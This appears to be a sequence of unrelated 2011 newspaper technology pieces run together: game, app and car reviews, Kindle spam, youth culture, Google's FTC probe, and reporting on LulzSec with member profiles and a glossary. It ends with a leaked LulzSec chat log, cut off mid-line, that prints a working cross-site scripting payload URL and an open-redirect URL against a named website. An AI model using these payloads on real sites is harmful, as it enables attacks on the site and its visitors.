Guide!(£0.69).Having inspected Mr Braschi'sThe Miracle of Vinegar: 65 Tried and Tested Uses For Health and Home!(which, at £0.69, works out at about 30p per screenful of text), I can testify that he is no Delia Smith. But at least he appears to write – or at any rate compile – his own stuff. In that respect, he represents the quality end of the Kindle self-publishing business.What seems to be happening is that Amazon's platform is being overwhelmed by spammers who "scrape" content from websites or, in some cases, actually lift entire texts, and republish them as ebooks. And, in a neat twist, each of these ersatz "books" can be marketed under several different titles as coming from different authors. Thus a book on health insurance is available asthree separate publications, priced at £2.15, £2.18 and £4.35. And aningenious entrepreneuris marketing a training course for Kindle "authors". "You just hand the video course to your spouse, your assistant, your brother... heck – even hand it to your 10-year-old kid! They'll be posting 10 or even 20 new Kindle books to your account EVERY DAY!"Kindle self-publishing, in other words, is metamorphosing into a new kind of lucrative spam. The pollution of a potentially interesting and valuable space in this way is depressing enough.  But why is Amazon allowing it to go on? Could the fact that it takes a 30%sliceof every transaction have anything to do with it? I only ask.
The iPhone is capable of truly stunning visuals – look no further thanInfinity Bladefor evidence – but it's the polished cartoon-style visuals that often make the best impression on the small screen.Who's That Flying?!(App Store, £1.79, Mediatonic) is one such example, with sharp 2D cartoon visuals applied to a side-scrolling shooter. An  immortal alien is charged with protecting Earth's major cities from the onslaught of an alien horde. The challenge lies with stopping the beasties getting past and damaging the metropolis, rather than protecting yourself. The defender can be stunned, leaving Earth vulnerable, but game over comes only when the city being protected is destroyed.Sliding a finger along the screen to move the costumed hero – he's shooting constantly – and tapping for an armament boost after a long chain of foes are destroyed are the only controls. The action is manic, and later levels are incredibly tricky, butWTF?!is a pleasing twist on a familiar genre.Similarly,Army of Darkness: Defense(59p, Backflip) takes Sam Raimi'sEvil Deadseries – the medieval third in the trilogy – gives it a cartoon twist, and subtly alters the  mechanics of the familiar tower defence game. Instead of setting traps for invading "deadites", the castle is protected by both player-controlled hero Ash (voiced by Bruce Campbell ) and a succession of variably skilled, upgradable troops. It's a slightly easier take on tower-defence, but no less enjoyable for it.
The opening minutes ofF.E.A.R 3are so densely packed with cliches from the horror and shooter genres that it's hard to imagine the game could blossom into something more sophisticated. Yet with a little time, developer Day 1 Studios unleashes a finely melded title, if one steeped in the thematically over-familiar. The game, which assumes the popular first-person format most famously championed byCall of Duty, tells a slightly convoluted tale of psychic warfare and an excessively dysfunctional family dominated by their paranormal talents. It will probably come as a relief to many thatF.E.A.R 3is not quite as aggressively and unrelentingly terrifying as some of its contemporaries. But nonetheless, it remains a very frightening game that doesn't shy away from violence, and its scarier moments are consistently well crafted. Best enjoyed as a two-player cooperative experience, the game actually does a better job as a shooter than a horror title, and the gun battles and set pieces are among the most polished and engrossing seen in these genres for some time.
In 1999, the firstApe Escapeoffered a brilliant introduction to the PlayStation's dualshock controller. Twelve years on, it's back to acquaint PS3 owners with Move, Sony's luminous, lollipop-shaped answer to the Wii-mote. In theory it's a perfect fit, and swinging the Move wand to net errant monkeys works fine, though where the olderApe Escapegames encouraged exploration and experimentation, this version constrains players to invisible rails. It plays like a cutesier (and less competent) take on arcade lightgun shooters of yore – there's even a graveyard sequence à laHouse of the Dead, complete with zombie monkeys pullingThriller-style dance moves. This format quickly palls, especially as there's no two-player mode, and while a smattering of minigames adds some variety, it's hard to imagine any child staying interested for long. As a cut-price introduction to Move it's not without a certain charm (the monkeypedia, which details particular chimps' preferences for dancing, horticulture or dressing up as feudal Japanese warlords, is a nice touch). But, simian samurai notwithstanding, , but Ape Escape just feels a bit perfunctory – particularly disappointing given the series' track record of putting new hardware to entertaining uses.
The youth of 2011 are a posse of Adam Ant-alike hipsters in so-tight-they-could-be-painted-on trousers, geek-pie haircuts and Day-Glo stripes on their faces. They are sullen, moody and misunderstood. So far, so James Dean.But is there actually something different going on? These kids get their culture, gossip and attitudes from Google and Facebook. They are constantly on, constantly promoting themselves and constantly connected. They think filming their mates slapping strangers and then putting the videos up on YouTube is hilarious. And, if you believe the reactionary headlines, this generation of digitally enabled, computer savvy youth is a menace to society, hacking into the mainframes of the most hallowed institutions in the world.OK, take a step back and try to recall your own generational transgressions. Youth culture, superficially dominated by musical tastes, slang, fashion and objectionable hairstyles, is nothing but an artefact of growing up. Sociologists have documented these little rebellions since the 19th century when, as author Jon Savage describes inTeenage: The Creation of Youth 1875-1945, the notion of "youth as a separate, stormy, rebellious stage of life began".Psychologically, "youth culture" is the outcome of the process that kids, navigating the tortured period of adolescence, go through as they seek a community that's distinct from that which has come before. It is a period rich in self-expression, catalysed by the negotiation of social boundaries. And, according to the UN, it is a culture that is currently being added to and subtracted from by the 1.1 billion people around the world between the ages of 15 and 24.What makes them now unique is that they have a (mostly) open communication platform at their fingertips that allows them to connect on a global scale with people going through the same biological, psychological and social changes. So instead of creating a group identity in the playground or at the mall, they have the potential to do it on social networks, in networked computer games and via SMS. And, as anyone who's observed kids in action knows, those who have the means are constantly connected."The web has become the place where young people most find their opportunity to explore and express their identities and their social relations, and navigate their way through the values that are on offer around them," says Sonia Livingstone, professor of social psychology and head of the department of media and communications at LSE.Professor Livingstone has studied media and its effects on young people for two decades. The greatest transformation she sees with the web compared with television, radio and print is that the technology puts the kids in the centre as culture creators rather than culture consumers. Not only does this upset traditional top-down marketing models but it also means that a single youth culture is now almost impossible to pin down. "Historically there has been a trigger – a music change or style change – that's prompted a variety of different youth adaptations," says Danah Boyd, co-author the MacArthur-funded research project book,Hanging Out, Messing Around, and Geeking Out. But now, with so many technological touch points and interest-driven groups, there's no single social change that catalyses them. Boyd, who has been studying kids' activities on networks like Facebook and MySpace for almost a decade, believes it's now easier to define "youth" by looking at how we use technology. If it's for gossip and socialising, you're probably a teen. If it's for dating, you're likely to be in your 20s. And, Boyd observes, other life stages use it in other ways."What young people are doing on Facebook when they gossip and socialise is intensively monitoring what everyone else is doing and what everyone else is saying," says Livingstone. "It keeps them constantly updated on what other young people are thinking and doing. It is the height of reflexivity." The constant awareness of the peer group conversation is a cultural shift away from opting in to opting out. Young people are now living in a much more anxious, self-judging way than previous childhoods. "It would be interesting to talk with young people about silences," Livingstone says. "About the pursuit of personal hobbies."What is most surprising about the findings of the research in this field is that, despite the much-hyped global network, there is very little evidence for a common global youth culture. Boyd argues that the way media is used by kids actually reinforces local connections. "Most young people interact with people they know in their everyday environments," she says.This has implications for kids' development. "When you go on to Facebook with teenagers, they live in a world where they think everybody thinks like them," she says. Livingstone concurs. "We ever more surround ourselves by people like us who share the same beliefs and values, thoughts and anxieties," she says. "There's much less time spent muddling along with people who are really quiet different." So rather than a globally homogenised youth culture, there a lots of little tight-knit, homogeneous fragments.Fundamentally, the processes that go into the development and expression of youth culture are the same, but the tools the kids use – whether they're social networks, blogs, games or YouTube – create more intensive feedback loops than have been experienced before. The effects of this are unknown. "Something transformative is happening," says Livingstone of the new media. "I don't think it's happened yet."We are at a period in which our societies are coming to grips with the new technology. In many ways, we are experiencing a technological adolescence ourselves. Part of the process is watching how people who have never experienced anything else push the boundaries. The kids and their youth culture, constrained by our fundamental social and psychological processes, are our canaries in the digital coalmine.
Price £17,360MPG 56.5Top speed 124mphDepending on whether you are a&nbsp;motorist who enjoys making decisions or not, the coming years will either be a thrilling opportunity for you to exercise your right to infinite choice or a&nbsp;time marked by paralysing indecision. Personally, I find it hard to choose between cereals, but let's be positive. Choiceisa good thing.The industry is on the cusp of a&nbsp;brave new world and over the next decade it will totally reinvent itself. Where once safety, speed and security ruled the roost, there is now only one consideration: fuel efficiency. And, like a pack of crisscrossing hounds trying to pick up a fox's scent, the industry has created a bewildering hydra of possible ways to stretch what fuel we have left. Alongside the stalwarts of diesel and petrol, you can now plump for an alternatively fuelled vehicle (AFV). This could be electric, petrol/alcohol, petrol/electric or petrol/gas. If you select an electric vehicle (EV), you could then choose between a pure electric vehicle (Pure EV), a plug-in hybrid (PHV), or an extended-range electric vehicle (E-REV).It can't be that long before petrol hits the tenner-a-gallon mark (it passed £6 earlier this year) and though we've been slow to kerb our enthusiasm for burning carbon, it's remarkable how motivating a pain in the wallet can be. That, combined with EU legislation which limits all new cars to less than 130g of CO2per km by 2015 (the average new-car figure is now 144g), means that eco motoring has hit a run of green lights.So which of the many options should you go for? Technological innovations mean ordinary cars can now achieve consumption figures that sound like they've been made up. Skoda's Fabia, VW's Polo and Citroën's C1 will do 70-plus miles to the gallon. Then there are the EVs. While we wait for a usable re-charging infrastructure to be built, EVs will mostly be the preserve of urban dwellers and at the moment there are only actually five on sale (Mitsubishi's i-MIEV, Smart's fortwo, Peugeot's iOn, Nissan's Leaf and Citroën's C-Zero), though many more are in the pipeline.But serving as a useful bridge between an all-electric, post-petrol future and the dying flourishes of the petroleum age are the hybrids, whose time has really come – and everyone from Porsche's Cayenne to Ferrari's 599 is getting in on the act.Honda, which led the hybrid charge with its innovative IMA-powered Insight more than a decade ago, has moved the game on again with its latest offering. The CR-Z is an attractive, affordable coupé that boasts low running costs and even lower depreciation figures. It's clearly inspired by the CRX's styling of the 80s, but has been reloaded for the 21st century. With its wide nose, low profile and chopped rear end it looks like a flying wedge. The rear seats are small but usable and behind them are the lithium-ion batteries that power a 14bhp electric motor positioned next to its zippy 1.4-litre petrol engine.The CR-Z would be a sporty, exhilarating drive at any time, but its raison d'être is the fact that it sips fuel like a reformed alcoholic. It's clean and serene. And if this is a glimpse of tomorrow's world, it's one decision you don't have to worry about…
The last collaboration between Goichi Suda and Shinji Mikami, two of Japan's finest videogame talents, resulted in the incendiarykiller7, a fiercely intelligent, defiantly adult psychological thriller with a unique style. By comparison,Shadows of the Damnedis pure grindhouse schlock, a descent into hell that is by turns disturbing and incredibly crude.Not that it's any less memorable. Suda, on scripting duties, has envisioned an underworld where sex and death intertwine. Tattooed hero Garcia Hotspur, here to rescue kidnapped girlfriend Paula, carries around a talking skull-cum-weapon named Johnson who transforms into a pistol named Boner, while obstructive tangles of brambles are referred to as "demons' pubes". The dialogue is relentlessly puerile, albeit knowingly so, and that makes the difference; the double entendres elicit both groans and laughs.Yet it's genuinely horrifying too: hell's gothic architecture is decorated with mangled corpses, while Paula appears in troubling visions that see her gruesomely dismembered or turned into a shrieking, psychotic pursuer whose touch means instant death. Elsewhere, storybooks foreshadow boss encounters, the unnerving tales behind these monstrosities cleverly heightening anticipation of their impending arrival (the sense of unease dissipated on only one occasion, as my enemy sat astride a worryingly flatulent horse).Underpinning this calculated insanity is a solid third-person shooter, reminiscent of Mikami's masterfulResident Evil 4but with a more agile protagonist. Combat is a matter of crowd control as skittering, leaping, clawing demons prove worthy foes in speed and viciousness if not in intelligence. Some must be purified with light before weapons will damage them, while the oily darkness that occasionally descends adds a puzzle element to these intense exchanges.Further attempts to add variety fall a little flat, but from Garcia and Johnson's easygoing banter, through Akira Yamaoka's splendidly outlandish score, to the friendly demon shopkeeper who provides ammo and items by regurgitating them, there is much to enjoy here. It might not be quite the masterpiece some hoped for, butShadows of the Damnedis a forceful reminder that Japanese game development is far more alive than the denizens of this deliriously demented vision of the underworld.
The British teenager accused of bringing down the website of the Serious Organised Crime Agency (Soca) has been diagnosed with Asperger's syndrome, a court has heard.Ryan Cleary, 19, of South Beech Avenue, Wickford, Essex, was arrested as part of a Scotland Yard and FBI probe into hacking group LulzSec.His lawyer told City of Westminster magistrates court on Saturday that Cleary has the form of autism, along with agoraphobia.District judge Nicholas Evans heard that Cleary's condition had been diagnosed by a psychologist.Cleary did not enter any plea to the five offences under the Criminal Law and Computer Misuse Act with which he is charged.He was granted bail but remains in custody after prosecutors objected. An appeal will be heard at Southwark crown court on Monday. The teenager spoke only to confirm his name and to say that he understood the proceedings.He was arrested at his family home on Monday as part of a Scotland Yard and FBI probe into LulzSec, a group that claims responsibility for hacking attempts on Soca, the US Senate and the CIA.He is charged with conspiring with other people on or before 20 June to create a remotely controlled network of zombie computers, known as a "botnet", to carry out distributed denial of service (DDoS) attacks, where websites are flooded with traffic to make them crash.He is alleged to have carried out similar attacks against the British Phonographic Industry's website on 29 October last year and the International Federation of the Phonographic Industry's website on or before 20 June.Cleary's case has parallels with that of Gary McKinnon, who has Asperger's and is fighting extradition to America over allegations of hacking into US military computers.
Shadows Of The Damned, PS3, Xbox 360You play Garcia Hotspur, a demon hunter whose persona owes more than a nod to El Mariachi.Your accomplice is a flaming skull with the ability to transform into anything from a shotgun to a motorbike. Keeping a relentless pace, dissonant choral music and the shrieks of fiends descending on you in surround sound merge with the powerful need to keep moving to avoid being overcome by the oft-encroaching darkness; all that in an endless, beast-infested, primarily subterranean labyrinth. It's perhaps not the archetypal midsummer videogame.Electronic Arts, £49.99Child Of Eden, Xbox 360Trippy: Child Of Eden.From Tetsuya Mizuguchi, creator of kinaesthetic masterpiece Rez, comes Child Of Eden, another on-rails shooting game that blends music and psychedelic visuals, while this time letting you control its surreal action using Kinect. For the first time, Kinect is easily the most involving way to play, your left hand taking care of machine gunning, while your right lets you lock on missiles, a flick of the wrist unleashing hell. The unfortunate byproduct is that players look as though they're alternately stroking and spanking an invisible pony with one hand then making strange, slow waving gestures with the other. It's hilarious spectator sport, though that's a small price to pay for an experience that has only very recently even become technically possible.Ubisoft, £39.99Legend Of Zelda: Ocarino Of Time 3D, Nintendo 3DSGee up: Legend Of Zelda - Ocarina Of Time 3DGraphically remade and now in cute, sparkly 3D, Legend Of Zelda: Ocarina Of Time is the apotheosis of console adventuring. Its perfect balance of exploration, puzzles and character development makes discovering the land of Hyrule and its two distinct time zones a wonderfully refined pleasure. Eschewing modern games' propensity for spoon-feeding you everything you need to know, Ocarina Of Time instead gives you a set of tools then lets you figure the rest out for yourself. This inevitably means getting stuck from time to time, but it also makes your triumphs far greater and more personal. Rich, beautifully made and epic in scope, it's the jewel of an already illustrious series, now even better looking and very slightly easier.Nintendo, £39.99Games news: Security updateIn the wake of Sony's admission that it had been hacked multiple times,Segahas also now lost 1.3m customers' detailsto cyber-intruders. It joins a growing list of game-related hackees that includesNintendo,Microsoft,Square Enix,CodemastersandEpic Games, although so far none has been targeted with the same ferocity asSony…In less frightening news,LittleBigPlanet 2, the deliciously inventive platform game with crowd-sourced level design, has announced downloadable content coming in September that will add motion-based Move functionality to its already dizzying toolkit …Elsewhere, the two former chiefs ofInfinity Ward, the developer behind the most popular outings in the all-consuming Call Of Duty franchise, are suing publisherActivisionfor unpaid royalties. Meanwhile, Activision has initiated its own lawsuits against the pair as well asElectronic Arts, for whom they now work. Although this is doubtless excellent news for members of California's legal profession, none of these wrangles are likely to result in new software being released.
Bugger. I had what I&nbsp;thought was a nice way into this one. It was about cars named after Mediterranean islands, and whether they shared any character traits with those places. Yeah, I know, pretty silly, but hey... So I was thinking of the Ford Capri and the Seat Ibiza, and even wondered whether Audi A4 All-Rhodes could be included (yes, I decided). And then I'd segue seamlessly into the VW Eos, which is, like the Greek island it's named after, youthful and fun, and would be perfect to pose about the Cyclades in. But then I&nbsp;looked it up and it's Ios, not Eos. Eos is the goddess of bloody dawn. Well, we did get up very early to catch the ferry to the Isle of Wight, which is an&nbsp;island, though not in the Mediterranean… I need to drop this.So VW has tweaked its coupe cabriolet. It's been given a nose job and an arse job – a new grille, new bumpers, and new lights at both the front and the back. And you know what, I preferred it before. There was an old one on the Isle of Wight ferry, so we could look at the two together. I liked those round lights it had at the back, it looked a bit different, unique, a bit Mykonos... Stop it! Now&nbsp;it's been brought into line, to&nbsp;look like the other VWs. It's been made more like a Passat, and more like a Passat is not good.Yes, but in your Passat there's no&nbsp;button that makes the roof miraculously disappear in 25 seconds. In your Passat you don't say: hey, it's a beautiful day, let's catch a ferry, do a lap of the Isle of Wight, stop for lunch atthe Baywatch cafe. Mmmm, mussels. In your Passat you don't think: I really, really like my car. Because in spite of the volk at VW's attempt to spoil the fun, they haven't totally succeeded. There's still something extremely likable about the Eos.It's not thrilling to drive. This one, with an efficient diesel engine and stop/start, is more about efficiency than thrills. But that's fine, what's the hurry? It's expensive. But nice things often are, I'm afraid. And when the roof's folded away, there's not a huge amount of room in the boot. So if you've got a lot of stuff, keep the roof up. There's even a sun roof when the roof is up.Aaah, that roof… it's a thing of joy&nbsp;and beauty. Five pieces, 470 components. Press the button, there's a little whirr, and the miracle&nbsp;begins. Flaps that you didn't&nbsp;know existed open; bits that&nbsp;were one thing turn into two or&nbsp;three; it&nbsp;all opens, upwards and outwards, like Santorini exploding in slow motion (enough!); and then&nbsp;it crumples itself up and puts itself away, neatly and perfectly. I&nbsp;did it over and over again, and clapped every time.VW Eos 2.0 TDIPrice£24,570Top speed129mphAcceleration0-62mph in 10.3 secondsAverageconsumption58.9mpgCO2 emissions125g/kmEco rating7/10In two wordsChristmas list
InsideSabuApparent founder and leader of LulzSec, he is a long-time hacktivist associated with senior Anonymous members. Decides who can join the group and who should be targeted. Attempts by rivals to uncover details about his real-life identity suggest he is a 30-year-old IT consultant skilled in the Python programming language who has lived in New York. The timing of some his tweets –tweeting "goodnight all" at 0700 BST, or 0200 New York time – implies he is on the US's eastern seaboard.TopiaryBelieved to be second-in-command, and the public face of LulzSec. An eloquent writer with a sharp turn of phrase, Topiary manages the mainLulzSec Twitter accountand has a hand in most of the group's rare public pronouncements. Well-known among hackers due to long links with senior Anonymous members. Chat logs taken over five days from May and June show Topiary to be oddly self-conscious – he said of a Wikipedia page about himself: "can we delete it somehow?" – and not beyond his own reproach: "Sabu and I got a bit carried away and gave LulzSec away a bit." Little is known about his identity, though he has been informally addressed as Daniel in leaked transcripts.KaylaThought to be the only senior female member of the hacking community, with lengthy involvement in the top command of Anonymous and, latterly, LulzSec. Apparently owns a powerfulbotnetused to take down targets. May have been instrumental in theattack in February on a US security firm, HBGary.In logs, referred to as LulzSec's "assassin/spy".StormAnother senior hacker apparently controlling a large botnet of infected computers. Known for targeting rival hacker forums, and acting on Sabu's instruction. Appears to be a veteran in the world of taking down websites, privately disclosing this month in logs seen by the Guardian that his denial of service tool is "over 10 years old".Joepie92/Joepie91Fringe member who spends much of the time "idling" in the group's chatrooms rather than actively co-ordinating or supporting attacks. Helps identify rival hackers. Little is known about his real-life identity.NeuronOne of the most technically able members of LulzSec, Neuron builds tools for the group and is occasionally involved in distributed denial of service (DDoS) attacks. Little is known about Neuron's real-life identity, although his use of "aye" for "yes" suggests he is in or from the UK.TflowCredited with creating LulzSec's famous Friday song, a comical skit denouncing other hackers and warning its rivals. Tflow also appears to be involved in maintenance for the main LulzSec website, protecting it from incoming attacks. Claims to have been around since the start of LulzSec towards the end of May.OutsideThe JesterEmphatically not a member of LulzSec. A lone-wolf hacker, self-described as a "hacktivist for good". Believed to be ex-military,The Jesterappears to have considerable firepower, which he principally employs against jihadist websites. A thorn in the side of the sprawling collectives Anonymous and, latterly, LulzSec for some time: publicly mocking their "childish" pursuits and threatening to expose key members by releasing their "Dox": documents and information that would identify them in real life. Most believe the Jester to be based in the US, a product of his military background. He also attacks what he calls "terrorists, sympathizers, fixers, facilitators, and other general bad guys". Brought down the WikiLeaks website in November, hours before it released the US diplomatic cables, with an enormousDDOSattack.LulzSec ExposedGroup of unknown size of self-described "web ninjas" who say they are unaffiliated to The Jester, but share his desire to out members of LulzSec. Claim to be angry on behalf of victims; English may not be their first language (or perhaps not that of the person(s) writing their blog. "We are not doing this for [the] sake of publicity or media attention," they say on their blog. "We just thought we could help and we did it."
Lulz"Giggles" or "laughs", with the flavour of schadenfreude.DoxDocumentation relating to the real-life identity of a hacker. A cause of huge paranoia for senior aficionados whose activity relies on remaining anonymous.BotnetNetwork of infected computers to remotely attack other websites. Botnets change hands for cash in the internet's criminal underworld. Ryan Cleary, the Essex teenager in custody over LulzSec-related attacks, is charged with distributing a botnet.DDoSIn a distributed denial of service (DDoS) attack, a network of computers (often a botnet) bombards a website with simultaneous requests to load, making it inaccessible for others. You don't need thousands of people: groups such as LulzSec are composed of a handful of people with access to botnets.IRCInternet Relay Chats are forums, public or private, for hackers and IT specialists. Taking part in the chats requires some tech expertise – the easiest way is through a downloaded client, which bars entry to police and journalists.VPNA Virtual Private Network, or VPN, is an anonymous internet connection, making it difficult to trace your real-life location. Used to prevent government spying (and in China to evade the "great firewall"), VPNs encrypt information the user sends over the internet.BitcoinsThe world's newest currency.Bitcoinsare an untraceable, cryptographically created, online currency that can be exchanged for real-life currency in certain online locations.
Google has been formally notified by the US Federal Trade Commission of a wide-ranging investigation into its dominance of the search advertising market,the company confirmed on Friday.The widely trailed investigation is the most significant in Google's 12-year history, on a par with the lengthy Department of Justice probe into Microsoft, which led to tighter regulation and from which the technology giant's image has never fully recovered.Google, which had revenues of $29bn (18.1bn) in 2010, was given notice on Thursday that the FTC will issue "civil investigative demands" – a civil law equivalent to subpoenas – compelling the search giant to share information about its business practices.One area of concern is whether or not Google's search results rank its own websites and services above those of rivals, which could be seen as anti-competitive. Many critics claim Google automatically places its own websites, such as Google Finance and Google Maps, towards the top of the list in search results.In a blog published on Friday, Google search engineer Amit Singhal confirmed: "Yesterday, we received formal notification from the US Federal Trade Commission that it has begun a review of our business. We respect the FTC's process and will be working with them."Google's share price has been falling since Wednesday as news of the inquiry leaked to the financial markets. At the time of publication, it had dropped $19 from Tuesday's closing price of $493, to just under $475.Google is facing similar probes by the European Commission and the Texas attorney general, but previous FTC inquiries have focused on more peripheral matters such as a proposed partnership with search rival Yahoo! and its acquisition of advertising technology group DoubleClick.The new FTC inquiry will focus on the heart of Google's search advertising business, which provides most of its revenue. The search engine has a near monopoly position. Despite the best efforts of Yahoo! and Microsoft's Bing, Google accounts for two-thirds of searches in the US, and close to 90% in the UK.Google has always maintained that access to its rivals is a mouse click away and switching search engines costs nothing. It counters arguments from some quarters that it should be regulated like a utility, and says competition comes from across the internet."Using Google is a choice," writes Singhal, "and there are lots of other choices available to you for getting information: other general-interest search engines, specialised search engines, direct navigation websites, mobile applications, social networks and more."
Whereas our daily Apps Rush post focuses on what's new on the various app stores, once a week we review the smartphone apps that we've spent some time with. This week's crop takes in gaming, music, literature and social applications.BackStabAndroid, iPhone, £3.99Originally released as an exclusive game for Sony Ericsson's PlayStation-branded Xperia Play Android smartphone, BackStab is now also available for iPhone and iPad. It's a piratical action-adventure with spectacular graphics and a free-roaming environment to explore. High production values are matched with smooth controls and a finely-tuned difficulty curve.Jack Kerouac's On the RoadiPad, £7.49There's a fascinating literary dust-up at the top of the iPad Books category chart at the moment between T.S. Eliot's The Waste Land and Jack Kerouac's On the Road. The latter, just released by Penguin, does a good job of augmenting Kerouac's novel with videos, photos and biographical information. Beat experts may not find much new in this extra content, but the app is more targeted at curious readers keen to get a wider view of the original book. The app makes elegant use of the touchscreen interface and large screen, too.InstaPhotoBlackBerry PlayBook, £2.99Instagram has been a big hit on iPhone with its blend of image manipulation and social photo-sharing. InstaPhoto takes the same model, but for RIM's new BlackBerry PlayBook tablet. You take shots and then apply a range of visual effects to them, including the tilt shift feature that has proved popular in Instagram. The resulting images can then be shared to Twitter, Facebook and Tumblr, so InstaPhoto isn't hiving you off into a separate social network. It's impressive, but the jury is out on how many people will be taking lots of photos on their tablets.Songkick ConcertsiPhone, FreeLive music website Songkick's first mobile app is brilliantly simple in concept: it scans the iPod music library on your iPhone, then tells you when artists whose music you own are playing nearby. You can search for gigs in other towns and cities too, and set up push notifications to ensure you are alerted as soon as new concerts are announced. You can also tap through to buy tickets for gigs, although here the experience varies according to how mobile-friendly Songkick's ticketing partners' websites are.Discovr AppsiPhone, iPad, £0.59The latest app designed to help you find more apps uses a flowchart-style interface, where iOS apps are linked according to their similarity. Start with one that you like, and see what it's connected to, double tapping at any time to read a full description, see screenshots and tap through to the App Store itself. It's an innovative and tactile way of making sense of the hundreds of thousands of apps jostling for your attention, although it complements other discovery apps like Appstream rather than replaces them.Grand Prix StoryAndroid, £3.10Japanese games developer Kairosoft had a word-of-mouth hit with its Game Dev Story title for iOS and Android, which put players into the (isometric) shoes of game studios. Grand Prix Story takes the same visual aesthetic and gameplay mechanics, but applies them to the world of motorsports. You create a team, train up drivers and develop new cars, with the result being a gripping and addictive experience. There's no official licence, but Formula 1 fans will love it.Hop on PopiPhone, iPad, Android, £2.39iPhone or Android-owning parents have a wide choice of apps for children, some based on popular books and brands, and others exclusive to the apps world. One of the brands competing for attention is Dr. Seuss, with pretty much every one of the books now available as an app – initially on iOS and now on Android. Hop on Pop is a good example of how they're being presented, with voice narration and words that are highlighted as children (or parents) touch the images on-screen. It's very much a book-app, with no games or detailed interactivity. Even so, the power of Dr. Seuss' wordplay remains delightful.Hydro Thunder GOWindows Phone, £3.99Microsoft is currently making a big push for Windows Phone gaming, with Angry Birds and Plants Vs. Zombies hogging most of the headlines. Hydro Thunder GO is well worth a look too though. Based on an existing watery racing game, it sees you flinging powerboats round a series of courses, uncovering short cuts and nabbing power-ups along the way. It's good fun, and the Xbox Live social features fuel the competitive streak. Well, they do if you have some friends who also have Windows Phones, anyway.
The trouble with hacking for glory – as LulzSec, aka Lulz Security are doing – is that you want everyone to know what you've done, but you don't want anyone to know who you actually are. And the combination of human nature, where people want their due respect, and the internet, where every action leaves some sort of trace, means there will always be tensions between carrying out acts and denying that you carried them out.The logs seen by the Guardian from within the group show how that can go astray. In one episode, they become worried after someone is discovered talking in a chatroom about some bounty given to him by "Kayla", one of the LulzSec members. "Kayla will talk to him," says Sabu, the leader of the group, with the clear indication that shutting him up is the aim.There's an irresistible echo with the scene in Martin Scorsese's mafia film Goodfellas, when after a successful heist the gangsters are told off by their bosses for flaunting their sudden wealth with fur coats and cars. The bathetic contrast – the gangsters have just stolen a hoard of gold bullion; the hackers have some Amazon voucher codes – only goes to heighten the bubble that the hackers live in.In many ways the hackers' attitudes mirror those of street gangs, where the talk is of respect, attacks, who can be trusted, who the enemies are (usually law enforcement and rival gangs), whose ground belongs to who, and who has accomplished what. The consolation is that these are gangs whose weapons won't lead to blood being spilt, and who aren't worried about walking accidentally into the wrong postcode.But hackers have similar problems: the twin threats from rival gangs and from law enforcement. The latter move more slowly, but are more dangerous; the former are quicker and can draw in the latter. LulzSec have prompted the ire of a powerful hacker, The Jester, an American ex-military operator who works alone. The Jester is only one of a number of rival hackers threatening to blow the lid off LulzSec. Others are angry too, calling LulzSec "suicide bombers of the internet" for their lack of any clear agenda; the attack on the Arizona police (on the grounds that LulzSec dislikes its proposed immigration laws) will not assuage that anger.Earlier this week the Jester posted so-called "dox" – documentation purporting to reveal the real-life identity of each senior hacker – relating to Sabu and Topiary. Even if the dox were wide of the mark, LulzSec may feel that the net is tightening. And once their secret identities are out in the open, it's game over.The logs detail a group more willing to cripple its foes' websites (especially 2600.com, a starting place for many hackers, and still regarded affectionately by some of the older ones) with distributed denial of service (DDoS) attacks than professional hacking exploits. Since its formation in May, the group has revelled in the playground warfare of taking down websites belonging to global corporations such as Sony Pictures and Fox.However, that does not mean that the group is incapable of more devastating attacks. Some of its members – including Sabu and Kayla – have been linked to the huge assault on US security firm HB Gary Federal in February. Even on Friday, LulzSec claimed on its Twitter account that it is preparing a "major leak", presumably of information stolen during one of its more daring hacking exploits. Quite how many more they will be able to carry out before hubris – or their pursuers – catch up is open to question. The simplest thing for LulzSec to do may be just to quietly split up – and for its members to deny forever that they ever belonged to the group. But denial too may be the hardest step to take besides silence.
**** BEGIN LOGGING AT TueMay 31 11:09:122011**** ENDING LOGGING AT TueMay 31 11:09:552011**** BEGIN LOGGING AT TueMay 31 11:09:552011May 31 11:12:06[redacted]http://www.billoreilly.com/pg/jsp/help/contactus.jsp?cid=1308195%3C%22%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E&amp;tid=401May 31 11:12:37[redacted]delivered :DMay 31 11:18:50*	Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-eliteMay 31 11:18:57Neurono/ morning!May 31 11:19:30[redacted]helloMay 31 11:19:38[redacted]XSS in billoreilly lolMay 31 11:19:42[redacted]http://www.billoreilly.com/pg/jsp/help/contactus.jsp?cid=1308195%3C%22%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E&amp;tid=401May 31 11:19:50[redacted]also a URL redirectionMay 31 11:19:51[redacted]http://www.billoreilly.com/site/rd?satype=1&amp;said=313&amp;pos=11&amp;url=http://www.meatspin.comMay 31 11:20:31NeuronlmfaoMay 31 11:20:39Neuronwow you been bizzyMay 31 11:21:54Neuronwhat made you go after billoreilly?May 31 11:22:59joepie92hai NeuronMay 31 11:23:02Neurono/May 31 11:23:54[redacted]the lulzMay 31 11:45:15*	Neuron yawnsMay 31 11:50:06AvunitGet on the new IRCd; use your login @ http://46.243.12.9/docs/ to check how to!May 31 11:51:18*	Neuron rages my login info is on my other machine :( Avunit help a man out?May 31 11:51:28AvunitlolMay 31 11:51:31Avunitill reset your passMay 31 11:51:35Avunitsinc ei cant obviously read itMay 31 11:51:45Neuronrgr thanksMay 31 11:51:50[redacted]AvunitMay 31 11:51:54AvunityeshMay 31 11:51:59[redacted]nvm i still ahve my pass :DMay 31 11:52:19*	Avunit has quit (SSL Connection closed)May 31 11:52:40*	Avunit (Avunit@HA-4o8.6s8.srgpum.IP) has joined #pure-eliteMay 31 11:52:48Avunitwhat is this for sorcery D:May 31 11:52:55NeuronXDMay 31 11:53:04*	Avunit has quit (Changing host)May 31 11:53:04*	Avunit (Avunit@netadmin.operationfreedom.ru) has joined 